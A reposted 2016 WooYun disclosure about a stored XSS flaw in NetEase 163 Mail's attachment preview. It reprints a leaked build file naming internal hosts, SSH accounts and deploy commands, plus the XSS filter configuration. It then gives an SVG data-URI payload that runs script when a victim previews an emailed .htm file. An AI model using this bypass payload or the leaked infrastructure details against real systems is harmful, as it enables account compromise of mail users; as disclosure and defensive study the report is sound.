记录黑客技术中优秀的内容, 传播黑客文化,分享黑客技术精华

163网易邮箱存储型XSS漏洞

2016-03-04 15:50

通过网易邮箱测试内容量较大的htm文件的预览时,抛出了了这样的异常。

code 区域
com.netease.mail.preview.exception.ProxyException: com.netease.security.xssdefender.filter.exception.TimeoutException: XSS filter timeouted!



感觉类名挺个性的,就去github找了一下。发现了这个:

code 区域
https://github.com/RyanTech/spider-2/



build.xml中多处出现163.org,netease的字样。这多半是和网易脱离不了干系了。

code 区域
<?xml version="1.0" encoding="UTF-8"?>

<!DOCTYPE project [<!ENTITY buildfile SYSTEM "file:./build-user.xml">]>

<!-- WARNING: Eclipse autogenerated file.

Any modifications will be overwritten.

Please edit build-user.xml instead.

-->

<project basedir="." default="release" name="pris-fetcher">

<property name="bin.dir" value="bin" />

<property name="lib.dir" value="lib" />

<property name="build.dir" value="build"/>

<property name="release.dir" value="release"/>

<property name="release.lib" value="release/lib"/>

<property name="release.conf" value="release/conf"/>

<property name="ssh.keyfile" value="e:/id_rsa"/>



<!--清理任务-->

<target name="clean">

<delete dir="${build.dir}"/>

</target>



<!--创建目录-->

<target name="init" depends="clean">

<mkdir dir="${build.dir}"/>

</target>



<path id="classpath">

<fileset dir="${lib.dir}">

<include name="*.jar"/>

</fileset>

</path>



<target name="build" depends="init" description="Build jar">

<jar jarfile="${build.dir}/common.jar" basedir="${bin.dir}">

<include name="com/netease/backend/collector/rss/common/**/*.class"/>

<exclude name="com/netease/backend/collector/rss/common/**/*Test.class"/>

</jar>

<jar jarfile="${build.dir}/crawler.jar" basedir="${bin.dir}">

<include name="com/netease/backend/collector/rss/crawler/**/*.class"/>

<include name="org/archive/crawler/**/*.class"/>

<exclude name="com/netease/backend/collector/rss/crawler/**/*Test.class"/>

</jar>

<jar jarfile="${build.dir}/manager.jar" basedir="${bin.dir}">

<include name="com/netease/backend/collector/rss/manager/**/*.class"/>

<exclude name="com/netease/backend/collector/rss/manager/**/*Test.class"/>

</jar>

</target>



<target name="common-release" depends="build">

<delete>

<fileset dir="${release.lib}" includes="*.jar"/>

</delete>

<copy todir="${release.lib}">

<fileset dir="${build.dir}">

<include name="*.jar"/>

</fileset>

</copy>

<copy todir="${release.lib}">

<fileset dir="${lib.dir}">

<include name="fetcher-common*.jar" />

<include name="dcas-analyzer*.jar" />

</fileset>

</copy>

</target>

<!--release version-->

<target name="release" depends="common-release">

<delete>

<fileset dir="${release.conf}">

<exclude name="**/.svn**" />

</fileset>

</delete>

<move todir="${release.conf}">

<fileset dir="${release.conf}">

</fileset>

<mapper type="regexp" from="^(.*)-online.(.*)$$" to="\1.\2" />

</move>

</target>



<target name="test" depends="common-release">

<delete>

<fileset dir="${release.dir}/test-conf">

<exclude name="**/.svn**" />

</fileset>

</delete>

</target>



<!--测试服务器重新启动-->

<target name="restart-test">

<sshexec host="app-61.photo.163.org" port="1046"

username="yuedu" trust="true" keyfile="${ssh.keyfile}"

command="cd /home/yuedu/pris-fetcher/;svn up lib/ rss-lib/ common-conf/;

sh duplicationFilter/bin/df.sh;sh start.sh;"/>

</target>



<!--线上升级,所有节点更新jar和conf配置文件,然后重启所有节点-->

<target name="upgrade-online">

<sshexec host="yuedu4.photo.163.org" port="1046"

username="yuedu" trust="true" keyfile="${ssh.keyfile}"

command="cd /home/yuedu/pris-fetcher/;svn up lib/ rss-lib/;sh start-df.sh;sh start.sh;

cd /mnt/hdir/0/dcas-default;sh start.sh;"/>

<sshexec host="yuedu5.photo.163.org" port="1046"

username="yuedu" trust="true" keyfile="${ssh.keyfile}"

command="cd /mnt/hdir/0/pris-fetcher-news/;svn up lib/ rss-lib/;

cd /home/yuedu/pris-fetcher-photo/;sh start.sh;"/>

<sshexec host="app-57.photo.163.org" port="1046"

username="dir" trust="true" keyfile="${ssh.keyfile}"

command="cd /home/dir/pris-fetcher-2/;svn up lib/ rss-lib/;sh start.sh;

cd ../pris-fetcher-news-2/;sh start.sh;"/>

<sshexec host="app-48.photo.163.org" port="1046"

username="dir" trust="true" keyfile="${ssh.keyfile}"

command="cd /home/dir/pris-fetcher-2/;svn up lib/ rss-lib/;sh start.sh;"/>

</target>



</project>



果断把下面的jar抱回家看了下,xss怎么过滤的:

code 区域
https://github.com/RyanTech/spider-2/blob/master/lib/xssdefender-1.3.6.jar



看了下base-config.properties:

code 区域
######################################

# base configuration for XSS Defender

# @author: superekcah



# format:

# string|value

#set|value1,value2

#map|key1:value1,value2;key2:value3,value4

######################################



# 标签处理的实现类

tagHandler=string|com.netease.security.xssdefender.filter.NodeFilter



# 报警接口实现类

alarm=string|



# 标签白名单,空表示不使用白名单过滤

tagsWhitelist=set|



# 需要去除的标签,包括标签内容及子节点

removeNodeTags=set|head,script,style,object,applet,noscript,frameset,noframes



# 需要去除的标签本身,不包括内容及子节点

removeTagOnlyTags=set|form,meta,body,html,label,select,optgroup,option,textarea,title,script,xmp,applet,embed,head,frameset,iframe,noframes,noscript,object,style,input,base,basefont,isindex,link,frame,param,xml,xss



# 指定标签需要过滤的属性

nodeAttrBlacklist=map|



# 指定标签允许保留的属性

nodeAttrWhitelist=map|img:src,alt,width,height;a:href,target,class;



# 属性中需要检查的关键字,注:只检查是 否以这些词开始

scriptKeywords=set|javascript,vbscript,script,actionscript



# 允许保留的CSS样式,注:如果set中只有一个值all,则允许所有样式

allowedStyleProps=set|font,font-size,font-weight,font-style,text-decoration,width,height,border,margin,padding



# 通过正则表达验证URL属性,default对应默认检查项,空则表达只检查是否关键词开头

urlValidators=map|default:^(https?://|/|#|mailto\\s*:).*



# 需要过滤的属性,/regex/为正则表达,其他要求逐字匹配

forbidAttributes=set|/on[a-zA-Z]+/,allowScriptAccess,allowNetworking,disabled



# 需要检查关键词开始的属性

keywordsCheckedAttributes=set|background



过滤了什么没过滤什么一目了然,也就没啥好分析的了。

构造poc,pwn之。

漏洞证明:

将下面的内容存储为pwn.htm



code 区域
<svg>

<use xlink:href="data:image/svg+xml;base64,PHN2ZyBpZD0icmVjdGFuZ2xlIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcvMjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hsaW5rIiAgICB3aWR0aD0iMTAwIiBoZWlnaHQ9IjEwMCI+PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg0KIDxmb3JlaWduT2JqZWN0IHdpZHRoPSIxMDAiIGhlaWdodD0i

NTAiDQogICAgICAgICAgICAgICAgICAgcmVxdWlyZWRFeHRlbnNpb25zPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hodG1sIj4NCgk8ZW1iZWQgeG1sbnM9Imh0dHA6Ly93d3cudzMub3JnLzE5OTkveGh0bWwiIHNyYz0iamF2YXNjcmlwdDphbGVydChsb2NhdGlvbikiIC8+DQogICAgPC9mb3JlaWduT2JqZWN0Pg0KPC9zdmc+#rectangle" /></svg>





添加到邮件附件,发送给victim。victim对文件进行浏览时:

屏幕快照 2016-01-16 下午1.51.09.png





游戏就结束了。上面的poc需要在ff下进行验证。

如果觉得影响范围不足够,可以和我联系。我可以进行进一步提供更通用的poc。

最后,如果上述问题属于coremail的问题,麻烦告知一下我好去拿奖金。

修复方案:

removeNodeTags加一个svg?





知识来源: www.wooyun.org/bugs/wooyun-2016-0170351

阅读:166048 | 评论:0 | 标签:xss 漏洞

想收藏或者和大家分享这篇好文章→复制链接地址

“163网易邮箱存储型XSS漏洞”共有0条留言

发表评论

姓名:

邮箱:

网址:

验证码:

公告

关注公众号hackdig,学习最新黑客技术

推广

工具

标签云